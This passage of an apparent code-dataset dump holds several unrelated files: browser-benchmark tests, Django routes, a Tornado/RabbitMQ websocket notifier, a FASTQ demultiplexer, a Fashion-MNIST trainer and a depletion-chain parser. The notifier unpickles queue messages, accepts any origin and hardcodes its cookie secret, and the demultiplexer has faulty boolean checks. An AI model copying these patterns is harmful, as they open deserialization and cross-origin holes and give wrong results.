self.assertEqual(len(stories_all), 1)\n story = stories[0]\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.name, self.name)\n story = stories_all[0]\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.name, self.name)\n self.assertEqual(story.url, self.story_cls.URL_LOCAL)\n\n args.custom_benchmark_url = None\n args.separate = False\n stories_all = self.benchmark_cls.stories_from_cli_args(args)\n self.assertEqual(len(stories_all), 1)\n story = stories_all[0]\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.name, self.name)\n self.assertEqual(story.url, self.story_cls.URL)\n\n def test_story_filtering(self):\n with self.assertRaises(ValueError):\n self.story_cls.from_names([])\n stories = self.story_cls.default(separate=False)\n self.assertEqual(len(stories), 1)\n\n with self.assertRaises(ValueError):\n self.story_cls.from_names([], separate=True)\n stories = self.story_cls.default(separate=True)\n self.assertEqual(len(stories), len(self.story_cls.SUBSTORIES))\n\n def test_story_filtering_regexp_invalid(self):\n with self.assertRaises(ValueError):\n _ = self.story_filter( # pytype: disable=wrong-arg-types\n \".*\", separate=True).stories\n\n def test_story_filtering_regexp(self):\n stories = self.story_cls.default(separate=True)\n stories_b = self.story_filter([\".*\"], separate=True).stories\n self.assertListEqual(\n [story.name for story in stories],\n [story.name for story in stories_b],\n )\n\n def test_run_throw(self):\n self._test_run(throw=True)\n\n def test_run_default(self):\n self._test_run()\n for browser in self.browsers:\n urls = self.filter_data_urls(browser.url_list)\n self.assertIn(f\"{self.story_cls.URL}?iterationCount=10\", urls)\n self.assertNotIn(f\"{self.story_cls.URL_LOCAL}?iterationCount=10\", urls)\n\n def test_run_custom_url(self):\n custom_url = \"http://test.example.com/speedometer\"\n self._test_run(custom_url)\n for browser in self.browsers:\n urls = self.filter_data_urls(browser.url_list)\n self.assertIn(f\"{custom_url}?iterationCount=10\", urls)\n self.assertNotIn(f\"{self.story_cls.URL}?iterationCount=10\", urls)\n self.assertNotIn(f\"{self.story_cls.URL_LOCAL}?iterationCount=10\", urls)\n\n def _test_run(self, custom_url: Optional[str] = None, throw: bool = False):\n repetitions = 3\n iterations = 2\n default_story_name = self.story_cls.SUBSTORIES[0]\n self.assertTrue(default_story_name)\n stories = self.story_cls.from_names([default_story_name], url=custom_url)\n example_story_data = {\n \"tests\": 
{\n \"Adding100Items\": {\n \"tests\": {\n \"Sync\": 74.6000000089407,\n \"Async\": 6.299999997019768\n },\n \"total\": 80.90000000596046\n },\n \"CompletingAllItems\": {\n \"tests\": {\n \"Sync\": 22.600000008940697,\n \"Async\": 5.899999991059303\n },\n \"total\": 28.5\n },\n \"DeletingItems\": {\n \"tests\": {\n \"Sync\": 11.800000011920929,\n \"Async\": 0.19999998807907104\n },\n \"total\": 12\n }\n },\n \"total\": 121.40000000596046\n }\n speedometer_probe_results = [{\n \"tests\": {story.name: example_story_data for story in stories},\n \"total\": 1000,\n \"mean\": 2000,\n \"geomean\": 3000,\n \"score\": 10\n } for i in range(iterations)]\n\n for browser in self.browsers:\n # This depends on the JS actions in SpeedometerStory:\n browser.js_side_effect = [\n True, # Page is ready\n None, # _setup_substories\n None, # _setup_benchmark_client\n None, # _run_stories\n True, # Wait until done\n speedometer_probe_results,\n ]\n benchmark = self.benchmark_cls(stories, custom_url=custom_url)\n self.assertTrue(len(benchmark.describe()) > 0)\n runner = Runner(\n self.out_dir,\n self.browsers,\n benchmark,\n env_config=HostEnvironmentConfig(),\n env_validation_mode=ValidationMode.SKIP,\n platform=self.platform,\n repetitions=repetitions,\n throw=throw)\n with mock.patch.object(\n HostEnvironment, \"validate_url\", return_value=True) as cm:\n runner.run()\n cm.assert_called_once()\n for browser in self.browsers:\n urls = self.filter_data_urls(browser.url_list)\n self.assertEqual(len(urls), repetitions)\n self.assertIn(SpeedometerProbe.JS, browser.js_list)\n\n with (self.out_dir /\n f\"{self.probe_cls.NAME}.csv\").open(encoding=\"utf-8\") as f:\n csv_data = list(csv.DictReader(f, delimiter=\"\\t\"))\n self.assertListEqual(list(csv_data[0].keys()), [\"label\", \"dev\", \"stable\"])\n self.assertDictEqual(csv_data[1], {\n 'label': 'version',\n 'dev': '102.22.33.44',\n 'stable': '100.22.33.44'\n })\n\n def _run_story_names(self, story_names: Sequence[str], separate: bool,\n expected_num_urls: int):\n repetitions = 3\n iterations = 2\n stories = self.story_cls.from_names(story_names, separate=separate)\n example_story_data = {\n \"tests\": {\n \"Adding100Items\": {\n \"tests\": {\n \"Sync\": 74.6000000089407,\n \"Async\": 6.299999997019768\n },\n \"total\": 80.90000000596046\n },\n \"CompletingAllItems\": {\n \"tests\": {\n \"Sync\": 22.600000008940697,\n \"Async\": 5.899999991059303\n },\n \"total\": 28.5\n },\n \"DeletingItems\": {\n \"tests\": {\n \"Sync\": 11.800000011920929,\n \"Async\": 0.19999998807907104\n },\n \"total\": 12\n }\n },\n \"total\": 121.40000000596046\n }\n speedometer_probe_results = [{\n \"tests\": {story.name: example_story_data for story in stories},\n \"total\": 1000,\n \"mean\": 2000,\n \"geomean\": 3000,\n \"score\": 10\n } for i in range(iterations)]\n\n for browser in self.browsers:\n browser.js_side_effect = [\n True, # Page is ready\n None, # _setup_substories\n None, # _setup_benchmark_client\n None, # _run_stories\n True, # Wait until done\n speedometer_probe_results,\n ]\n benchmark = self.benchmark_cls(stories)\n self.assertTrue(len(benchmark.describe()) > 0)\n runner = Runner(\n self.out_dir,\n self.browsers,\n benchmark,\n env_config=HostEnvironmentConfig(),\n env_validation_mode=ValidationMode.SKIP,\n platform=self.platform,\n repetitions=repetitions)\n with mock.patch.object(self.benchmark_cls, \"validate_url\") as cm:\n runner.run()\n cm.assert_called_once()\n\n for browser in self.browsers:\n urls = self.filter_data_urls(browser.url_list)\n 
self.assertEqual(len(urls), expected_num_urls)\n self.assertIn(self.probe_cls.JS, browser.js_list)\n\n with (self.out_dir /\n f\"{self.probe_cls.NAME}.csv\").open(encoding=\"utf-8\") as f:\n csv_data = list(csv.DictReader(f, delimiter=\"\\t\"))\n self.assertListEqual(list(csv_data[0].keys()), [\"label\", \"dev\", \"stable\"])\n self.assertDictEqual(csv_data[1], {\n 'label': 'version',\n 'dev': '102.22.33.44',\n 'stable': '100.22.33.44'\n })\n with self.assertLogs(level='INFO') as cm:\n for probe in runner.probes:\n for run in runner.runs:\n probe.log_run_result(run)\n output = \"\\n\".join(cm.output)\n self.assertIn(\"Speedometer results\", output)\n\n with self.assertLogs(level='INFO') as cm:\n for probe in runner.probes:\n probe.log_browsers_result(runner.browser_group)\n output = \"\\n\".join(cm.output)\n self.assertIn(\"Speedometer results\", output)\n self.assertIn(\"102.22.33.44\", output)\n self.assertIn(\"100.22.33.44\", output)\n\n def test_run_combined(self):\n self._run_story_names([\"VanillaJS-TodoMVC\", \"Elm-TodoMVC\"],\n separate=False,\n expected_num_urls=3)\n\n def test_run_separate(self):\n self._run_story_names([\"VanillaJS-TodoMVC\", \"Elm-TodoMVC\"],\n separate=True,\n expected_num_urls=6)\n","sub_path":"third_party/crossbench/tests/crossbench/benchmarks/speedometer_helper.py","file_name":"speedometer_helper.py","file_ext":"py","file_size_in_byte":11558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"345531799","text":"from django.contrib import admin\nfrom django.conf.urls import include, url\nfrom libs.views import *\n\nurlpatterns = [\n url(r'^logout/$', Logout, name='logout'),\n url(r'^register-member/$', register, name='register-member'),\n url(r'^user-profile/$', user_profile, name='user-profile'),\n url(r'^update-confirmation/$', update_confirmation, name='update-confirmation'),\n url(r'^register-confirmation/$', register_confirmation,\n name='register-confirmation'),\n url(r'^add-dict/$', add_dict, name='add-dict'),\n url(r'^accts/$', accts, name='accts'),\n url(r'^', dashboard, name='dashboard'),\n\n\n\n]\n","sub_path":"libs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"633233024","text":"import sys\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nimport pika\nfrom pika.adapters.tornado_connection import TornadoConnection\nimport pickle\nimport json\nimport uuid\nimport logging\nimport os\n\nfrom tornado.options import define, options\n\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\n\nrabbitmq_server = os.environ.get(\"RABBITMQ_SERVER\")\n\nclass Application(tornado.web.Application):\n def __init__(self):\n self.recieve = PikaClient()\n self.recieve.connect()\n\n handlers = [(r\"/notification\", ChatSocketHandler)]\n settings = dict(\n cookie_secret=\"UXZpTuZvFACo1pOgNNvG0sbPm4RFyNToXzI+HAtkp4c=\",\n xsrf_cookies=True,\n )\n super(Application, self).__init__(handlers, **settings)\n\n\nclass ChatSocketHandler(tornado.websocket.WebSocketHandler):\n waiters = {}\n \n def check_origin(self, origin):\n # Enable cross-domain request\n # logging.info(origin)\n return True\n \n def get_compression_options(self):\n # Non-None enables compression with default options.\n return {}\n\n def open(self):\n self.uuid = str(uuid.uuid4())\n ChatSocketHandler.waiters[self.uuid] = self\n session_info = 
{\n 'type': \"CONNECT\",\n 'id': self.uuid,\n }\n\n waiter = self\n try:\n waiter.write_message(json.dumps(session_info))\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n def on_close(self):\n ChatSocketHandler.waiters.pop(self.uuid)\n\n @staticmethod\n def on_caculate_success(uuid, index):\n logging.info(\"on_caculate_success\")\n cacalation_notification_info = {\n 'type': \"NOTIFICATION_CACULATION_SUCCESS\",\n 'index': index\n }\n if uuid in ChatSocketHandler.waiters:\n waiter = ChatSocketHandler.waiters[uuid]\n waiter.write_message(json.dumps(cacalation_notification_info))\n\n\nclass PikaClient(object):\n def __init__(self):\n self.ioloop = tornado.ioloop.IOLoop.instance()\n self.connection = None\n self.channel = None\n\n\n self._delivery_tag = 0\n self.parameters = pika.ConnectionParameters(rabbitmq_server)\n\n def connect(self):\n self.connection = TornadoConnection(self.parameters, on_open_callback=self.on_connected, stop_ioloop_on_close=False, on_open_error_callback=self.on_open_error)\n self.connection.add_on_close_callback(self.on_closed)\n\n def on_open_error(self, unused_connection, err):\n sys.exit(1)\n\n def on_connected(self, connection):\n logging.info('PikaClient: connected to RabbitMQ')\n self.connection.channel(self.on_exchange_declare)\n\n def on_exchange_declare(self, channel):\n logging.info('PikaClient: Channel %s open, Declaring exchange' % channel)\n self.channel = channel\n self.channel.exchange_declare(self.on_queue_declare, exchange='notification', exchange_type='direct')\n\n def on_queue_declare(self, method_frame):\n logging.info('PikaClient: Channel open, Declaring queue')\n self.channel.queue_declare(self.on_queue_bind, queue='notification') #, durable=True)\n\n def on_queue_bind(self, method_frame):\n logging.info('Queue bound')\n self.channel.queue_bind(self.on_consume_bind, queue=\"notification\", exchange=\"notification\", routing_key=\"notification\")\n\n def on_consume_bind(self, frame):\n logging.info(\"Consume bind\")\n self.channel.basic_qos(prefetch_count=1)\n self.channel.basic_consume(self.on_response, queue='notification', no_ack=False)\n\n def on_response(self, channel, method, properties, body):\n logging.info('on_response')\n message=pickle.loads(body)\n logging.info(message)\n ChatSocketHandler.on_caculate_success(message['id'], message['index'])\n channel.basic_ack(delivery_tag = method.delivery_tag)\n\n def on_closed(self, connection):\n logging.info('PikaClient: rabbit connection closed')\n self.connection.close()\n self.channel.close()\n self.ioloop.stop()\n\n\ndef main():\n tornado.options.parse_command_line()\n app = Application()\n app.listen(options.port)\n\n tornado.ioloop.IOLoop.current().start()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"labs/final_project/notification_service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"414906898","text":"#!/usr/bin/env python\n\n### Imported methods ###\nimport itertools\nimport argparse\nimport gzip\n\n### Argparse ###\ndef get_args():\n \"\"\"\n Adds a command line option to perform this script in the terminal.\n \"\"\"\n parser = argparse.ArgumentParser(description='Demultiplex a raw fastq file.')\n parser.add_argument('-r1','--read1', help='read1.fastq file location', required=True)\n parser.add_argument('-r2','--read2', help='read2.fastq file location', required=True)\n parser.add_argument('-r3','--read3', help='read3.fastq 
file location', required=True)\n parser.add_argument('-r4','--read4', help='read4.fastq file location', required=True)\n parser.add_argument('-cutoff','--cutoff', help='desired qscore cutoff value', required=True)\n return parser.parse_args()\nargs = get_args()\n\n### Global variables ###\nR1_FASTQ = args.read1\nR2_FASTQ = args.read2\nR3_FASTQ = args.read3\nR4_FASTQ = args.read4\nqscore_cutoff = int(args.cutoff)\nindexes = [\"GTAGCGTA\",\"CGATCGAT\",\"GATCAAGG\",\"AACAGCGA\",\"TAGCCATG\",\"CGGTAATC\",\"CTCTGGAT\",\"TACCGGAT\",\"CTAGCTCA\",\"CACTTCAC\",\"GCTACTCT\",\"ACGATCAG\",\"TATGGCAC\",\"TGTTCCGT\",\"GTCCTAAG\",\"TCGACAAG\",\"TCTTCGAC\",\"ATCATGCG\",\"ATCGTGGT\",\"TCGAGAGT\",\"TCGGATTC\",\"GATCTTGC\",\"AGAGTCCA\",\"AGGATAGC\"]\n\n### Functions ###\ndef convert_phred(letter):\n \"\"\"Converts a single character into a quality score\n single character (A) --> ASCII (65) - 33 = 32\"\"\"\n qscore = ord(letter) - 33\n return qscore\n\ndef check_qscore(qscore):\n \"\"\"\n Calls on convert_phred to onverts a quality score \\\n and check if the score meets the cutoff. Will \\\n return a Boolean value.\n \"\"\"\n for letter in qscore:\n score = convert_phred(letter)\n if score < qscore_cutoff:\n return False\n return True\n\ndef reverse_complement(sequence):\n \"\"\"\n Takes a sequence string and makes a \\\n reverse complement of it.\n Example: \n sequence reverse complement\n GTAGCGTA TACGCTAC\n \"\"\"\n complements = str.maketrans(\"ATGCN\", \"TACGN\")\n revcom_sequence = sequence.translate(complements)[::-1]\n return revcom_sequence\n\ndef create_revcom_indexes():\n \"\"\"\n This function will make a list of reverse complements of the indexes.\n \"\"\"\n revcom_indexes = []\n for i in indexes:\n revcom_index = reverse_complement(i)\n revcom_indexes.append(revcom_index)\n return revcom_indexes\nrevcom_indexes = create_revcom_indexes()\n\ndef populate_matched():\n \"\"\"\n This function will populate all possible index hopping combinations as a \\\n tuple pair (x, y) and put them into a list.\n It will call the reverse complement function for y.\n \"\"\"\n matched_dict = {}\n zipped = zip(indexes, revcom_indexes)\n matched_list = list(zipped)\n for item in matched_list:\n paired = \"-\".join(item)\n matched_dict.setdefault(paired,0)\n # if paired in matched_dict:\n # matched_dict[paired] += 1\n # else:\n # matched_dict.setdefault(paired,0)\n return matched_list, matched_dict\nmatched_list, matched_dict = populate_matched()\n#print(matched_list)\n#print(matched_dict)\n\ndef populate_unmatched():\n \"\"\"\n This function will populate all possible index hopping combinations \\\n as a tuple pair (x, y), where 'x' is index1 and 'y' is the reverse complement \\\n of index2 and put them into a dictionary.\n \"\"\"\n hopped_dict = {}\n all_indexes = [indexes, revcom_indexes]\n all_unmatched = list(itertools.product(*all_indexes))\n filtered = list(filter(lambda i: i not in matched_list, all_unmatched))\n for item in filtered:\n paired = \"-\".join(item)\n hopped_dict.setdefault(paired,0)\n # if paired in hopped_dict:\n # hopped_dict[paired] += 1\n # else:\n # hopped_dict.setdefault(paired,0)\n return hopped_dict\nhopped_dict = populate_unmatched()\n#print(hopped_dict)\n\ndef name_outfiles():\n \"\"\"\n This function will name all the output files as strings and put \\\n them into a list.\n \"\"\"\n R1 = itertools.cycle([\"_R1.fastq\"])\n R4 = itertools.cycle([\"_R4.fastq\"])\n R1_files = list(zip(indexes, R1))\n pairs = [\"Hopped_R1.fastq\",\"Hopped_R4.fastq\",\"LowQ_R1.fastq\",\"LowQ_R4.fastq\"]\n 
for pair1 in R1_files:\n pair1 = \"\".join(pair1)\n pairs.append(str(pair1))\n R4_files = list(zip(indexes, R4))\n for pair2 in R4_files:\n pair2 = \"\".join(pair2)\n pairs.append(str(pair2))\n return pairs\noutfiles = name_outfiles()\n\ndef name_fhs():\n \"\"\"\n This function will name the file handles (fh) to be used and put them in \\\n to a list.\n \"\"\"\n fh = itertools.cycle([\"fh\"])\n nums = list(range(len(outfiles)))\n y = []\n for num in nums:\n string = str(num)\n y.append(string)\n fhs = list(zip(fh, y))\n pairs = []\n for pair in fhs:\n pair = \"\".join(pair)\n pairs.append(pair)\n return pairs\nfhs = name_fhs()\n\ndef open_files():\n \"\"\"This function will open files to write for the main().\n \"\"\"\n for i, item in enumerate(outfiles):\n fhs[i] = open(item,\"w\")\n print(\"Opened files\")\n return\n\ndef close_files():\n \"\"\"\n This function will close files written from the main().\n \"\"\"\n for pos in outfiles:\n pos = (pos.split(\"_\")[0])\n handle1 = outfiles.index(pos+\"_R1.fastq\")\n handle2 = outfiles.index(pos+\"_R4.fastq\")\n fhs[handle1].close()\n fhs[handle2].close()\n print(\"Closed files\")\n return\n\n### Main script ###\nwith gzip.open(R1_FASTQ, 'tr') as R1, gzip.open(R2_FASTQ,'tr') as R2, gzip.open(R3_FASTQ,'tr') as R3, gzip.open(R4_FASTQ,'tr') as R4:\n open_files()\n\n # counters\n LN = 0\n RN = 0\n lowQ_records = 0\n hopped_records = 0\n matched_records = 0\n\n # lists to hold each record for each file\n R1_record = []\n R2_record = []\n R3_record = []\n R4_record = []\n\n # read all 4 files line by line simultanously\n for R1_line, R2_line, R3_line, R4_line in zip(R1, R2, R3, R4):\n LN += 1\n R1_line = R1_line.strip()\n R2_line = R2_line.strip()\n R3_line = R3_line.strip()\n R4_line = R4_line.strip()\n \n # add lines to each record list\n if LN//4 == RN:\n R1_record.append(R1_line)\n R2_record.append(R2_line)\n R3_record.append(R3_line)\n R4_record.append(R4_line)\n else:\n R1_record.append(R1_line)\n R2_record.append(R2_line)\n R3_record.append(R3_line)\n R4_record.append(R4_line)\n RN += 1\n\n # index1 and index2 calculations\n index1 = R2_record[1]\n index2 = R3_record[1]\n paired = index1+\"-\"+index2\n rc_index2 = reverse_complement(index2)\n qscore1 = R2_record[3]\n qscore2 = R3_record[3]\n check1 = check_qscore(qscore1)\n check2 = check_qscore(qscore2)\n\n # add index1 and index2 onto header1 and header2\n header1 = R1_record[0] + \" \" + paired\n header2 = R4_record[0] + \" \" + paired\n\n # check index read quality\n if check1 and check2 == True:\n\n # good index read quality; check if known index read\n if index1 and rc_index2 in indexes:\n\n # good index read quality; known index reads; check if paired indexes in matched_dict\n if paired in matched_dict:\n matched_records += 1\n matched_dict[paired] += 1\n\n # finding the index position of the index in outfiles\n for pos in outfiles:\n pos = (pos.split(\"_\")[0])\n handle1 = outfiles.index(pos+\"_R1.fastq\")\n handle2 = outfiles.index(pos+\"_R4.fastq\")\n\n # writing to the appropriate file handles for each index\n if index1 == pos:\n fhs[handle1].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n fhs[handle2].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n break\n\n # good index read quality; known index reads; not in matched_dict; check if in hopped_dict\n elif paired in hopped_dict:\n hopped_records += 1\n hopped_dict[paired] += 1\n 
                    fhs[0].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n                    fhs[1].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n\n                else:\n                    lowQ_records += 1\n                    fhs[2].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n                    fhs[3].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n\n            # good index read quality; unknown index1 or rc_index2\n            else:\n                lowQ_records += 1\n                fhs[2].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n                fhs[3].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n\n        # bad index read quality\n        else:\n            lowQ_records += 1\n            fhs[2].write(str(header1)+\"\\n\"+str(R1_record[1])+\"\\n\"+str(R1_record[2])+\"\\n\"+str(R1_record[3])+\"\\n\")\n            fhs[3].write(str(header2)+\"\\n\"+str(R4_record[1])+\"\\n\"+str(R4_record[2])+\"\\n\"+str(R4_record[3])+\"\\n\")\n\n        # clear record lists for next record\n        R1_record.clear()\n        R2_record.clear()\n        R3_record.clear()\n        R4_record.clear()\n\n    # close output files\n    close_files()\n\n### writing outputs to output file ###\nwith open(\"outputs.txt\",\"w\") as out_file:\n    # calculating percentages for index pairs\n    lowQ_percent = (lowQ_records / RN) * 100\n    hopped_percent = (hopped_records / RN) * 100\n    matched_percent = (matched_records / RN) * 100\n\n    # All record values table\n    out_file.write(\"Record Type\"+\"\\t\"+\"# of all\"+\"\\t\"+\"Percent\"+\"\\n\")\n    out_file.write(\"All: \"+str(RN)+\"\\n\")\n    out_file.write(\"Matched:\"+\"\\t\"+str(matched_records)+\"\\t\"+str(matched_percent)+\"\\n\")\n    out_file.write(\"Hopped:\"+\"\\t\"+str(hopped_records)+\"\\t\"+str(hopped_percent)+\"\\n\")\n    out_file.write(\"Low quality/unknown:\"+\"\\t\"+str(lowQ_records)+\"\\t\"+str(lowQ_percent)+\"\\n\\n\")\n\n    # sorted table of matched indexes and counts\n    out_file.write(\"Matched index pairs\"+\"\\t\"+\"# of occurrences\"+\"\\n\")\n    for item in sorted(matched_dict):\n        out_file.write(str(item)+\"\\t\"+str(matched_dict[item])+\"\\n\")\n    out_file.write(\"\\n\\n\")\n\n    # Sorted table of hopped indexes and counts\n    out_file.write(\"Hopped index pairs\"+\"\\t\"+\"# of occurrences\"+\"\\n\")\n    for item in sorted(hopped_dict):\n        out_file.write(str(item)+\"\\t\"+str(hopped_dict[item])+\"\\n\")","sub_path":"Assignment-the-third/demux.py","file_name":"demux.py","file_ext":"py","file_size_in_byte":11223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"432451872","text":"# -*- coding: utf-8 -*-\nimport os\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport logging\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\ndef get_logger(name=None):\n    logger = logging.getLogger(name)\n    logger.setLevel(logging.INFO)\n    # console\n    sh = logging.StreamHandler()\n    sh.setLevel(logging.INFO)\n    formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')\n    sh.setFormatter(formatter)\n    logger.addHandler(sh)\n    return logger\n\ndef decode_csv(line):\n\ta=[[0.0] for i in range(785)]\n\tparsed_line = tf.decode_csv(line, a)\n\t#print parsed_line\n\tlabel=parsed_line[0]\n\tlabel = tf.cast(label, tf.int64)\n\tfeatures=tf.stack(parsed_line[1:])\n\tfeatures=tf.cast(features,tf.float32)\n\tfeatures=tf.multiply(features,1/255.)\n\tfeatures = tf.reshape(features, [28,28,1])\n\treturn features,label\n
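# Hypothetical walk-through of decode_csv above: each CSV row carries 785\n# numbers (label first, then 784 pixels), e.g. \"5,0,13,...,0\" becomes a\n# 28x28x1 float image rescaled to [0,1] plus the int64 label 5.\n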
\ndef process(batch_size=64):\n\tdataset = tf.data.TextLineDataset('./data/fashion-mnist_train.csv').skip(1)\n\tdataset = dataset.map(decode_csv)\n\tdataset = dataset.batch(batch_size=batch_size)\n\tdataset = dataset.repeat()\n\treturn dataset\ndef train():\n\t# network\n\tinputs = tf.placeholder(tf.float32, [None, 28, 28, 1], name='inputs')\n\t# inputs=tf.random_normal([64, 28,28,1], 0.0, 0.05)\n\tconv1 = tf.layers.conv2d(inputs=inputs, filters=64, kernel_size=(3, 3), padding=\"same\", activation=tf.nn.relu)\n\tconv2 = tf.layers.conv2d(inputs=conv1, filters=64, kernel_size=(3, 3), padding=\"same\", activation=tf.nn.relu)\n\tpool1 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\tconv3 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3), padding=\"same\", activation=tf.nn.relu)\n\tconv4 = tf.layers.conv2d(inputs=conv3, filters=128, kernel_size=(3, 3), padding=\"same\", activation=tf.nn.relu)\n\tpool2 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2)\n\tpool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 128])\n\tfc1 = tf.layers.dense(pool2_flat, 500, activation=tf.nn.relu)\n\tdropout=tf.layers.dropout(inputs=fc1,rate=0.5)\n\tfc2 = tf.layers.dense(dropout, 10)\n\ty_out = tf.nn.softmax(fc2)\n\ty_ = tf.placeholder(tf.float32, [None, 10])\n\tcross_entropy = -tf.reduce_mean(y_ * tf.log(y_out)) # compute the cross-entropy loss\n\t\n\tlearning_rate=0.001\n\ttrain_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy)\n\tcorrect_prediction = tf.equal(tf.argmax(y_out, 1), tf.argmax(y_, 1)) # check whether predictions match the true labels\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\t\n\tdataset=process()\n\titerator = dataset.make_one_shot_iterator()\n\timg_batch, label_batch = iterator.get_next()\n\n\tinit = tf.global_variables_initializer()\n\tlogger=get_logger()\n\twith tf.Session() as session:\n\t\tsession.run(init)\n\t\tthreads = tf.train.start_queue_runners()\n\t\tsaver = tf.train.Saver(tf.global_variables(), max_to_keep=20)\n\t\tfor i in range(10000):\n\t\t\timg_batch_i, label_batch_i = session.run([img_batch, tf.one_hot(label_batch, depth=10)])\n\t\t\tfeed = {inputs: img_batch_i, y_: label_batch_i}\n\t\t\tloss,_,acc=session.run([cross_entropy,train_step,accuracy], feed_dict=feed)\n\t\t\tlogger.info(\"step%d loss:%f accuracy:%f lr:%f\"%(i,loss,acc,learning_rate))\n\n\t\tsaver.save(session, \"./mnist.ckpt\")\nif __name__==\"__main__\":\n\ttrain_data_path='data/fashion-mnist_train.csv'\n\ttfrecord_name='train.tfrecords'\n\ttrain()\n\t#process()\n\t\n","sub_path":"tensorflow/fashion_mnist_parse_csv.py","file_name":"fashion_mnist_parse_csv.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"305174671","text":"\"\"\"depletion_chain module.\n\nThis module contains information about a depletion chain. 
A depletion chain is\nloaded from an .xml file and all the nuclides are linked together.\n\"\"\"\n\nfrom collections import OrderedDict\nimport zernike\n\n_REACT_LIST=['fission', '(n,gamma)', '(n,2n)', '(n,3n)', '(n,4n)', '(n,p)', '(n,a)'] # Jiankai \n\nclass DepletionChain:\n \"\"\" The DepletionChain class.\n\n This class contains a full representation of a depletion chain.\n\n Attributes\n ----------\n n_nuclides : int\n Number of nuclides in chain.\n n_fp_nuclides : int\n Number of fission product nuclides in chain.\n nuclides : List[nuclide.Nuclide]\n List of nuclides in chain.\n nuclide_dict : OrderedDict[int]\n Maps a nuclide name to an index in nuclides.\n precursor_dict : OrderedDict[int]\n Maps a nuclide name to an index in yields.fis_yield_data\n yields : nuclide.Yield\n Yield object for fission.\n reaction_to_ind : OrderedDict[int]\n Dictionary mapping a reaction name to an index in ReactionRates.\n \"\"\"\n\n def __init__(self):\n self.n_nuclides = None\n self.n_fp_nuclides = None\n self.nuclides = None\n\n self.nuclide_dict = None\n self.precursor_dict = None\n\n self.yields = None\n\n self.react_to_ind = None\n\n def xml_read(self, filename):\n \"\"\" Reads a depletion chain xml file.\n\n Parameters\n ----------\n filename : str\n The path to the depletion chain xml file.\n\n Todo\n ----\n Allow for branching on capture, etc.\n \"\"\"\n import xml.etree.ElementTree as ET\n import code\n import numpy as np\n import nuclide\n\n # Create variables\n self.n_nuclides = 0\n self.n_fp_nuclides = 0\n self.nuclides = []\n self.react_to_ind = OrderedDict()\n self.nuclide_dict = OrderedDict()\n\n # Load XML tree\n root = ET.parse(filename)\n\n # Read nuclide tables\n decay_node = root.find('decay_constants')\n\n nuclide_index = 0\n reaction_index = 0\n\n for nuclide_node in decay_node.findall('nuclide_table'):\n self.n_nuclides += 1\n\n nuc = nuclide.Nuclide()\n\n # Just set it to zero to ensure it's set\n nuc.yield_ind = 0\n nuc.fission_power = 0.0\n\n nuc.name = nuclide_node.get('name')\n nuc.n_decay_paths = int(nuclide_node.get('decay_modes'))\n nuc.n_reaction_paths = int(nuclide_node.get('reactions'))\n\n self.nuclide_dict[nuc.name] = nuclide_index\n\n # Check for decay paths\n if nuc.n_decay_paths > 0:\n # Create objects\n nuc.decay_target = []\n nuc.decay_type = []\n nuc.branching_ratio = []\n\n nuc.half_life = float(nuclide_node.get('half_life'))\n\n for decay_node in nuclide_node.iter('decay_type'):\n nuc.decay_target.append(decay_node.get('target'))\n nuc.decay_type.append(decay_node.get('type'))\n nuc.branching_ratio.append(\n float(decay_node.get('branching_ratio')))\n\n # Check for reaction paths\n if nuc.n_reaction_paths > 0:\n # Create objects\n nuc.reaction_target = []\n nuc.reaction_type = []\n\n for reaction_node in nuclide_node.iter('reaction_type'):\n r_type = reaction_node.get('type')\n\n # Add to total reaction types\n if r_type not in self.react_to_ind: # and r_type in _REACT_LIST: # Jiankai \n self.react_to_ind[r_type] = reaction_index\n reaction_index += 1\n\n nuc.reaction_type.append(r_type)\n # If the type is not fission, get target, otherwise\n # just set the variable to exists.\n if r_type != 'fission':\n nuc.reaction_target.append(reaction_node.get('target'))\n else:\n nuc.reaction_target.append(0)\n nuc.fission_power = 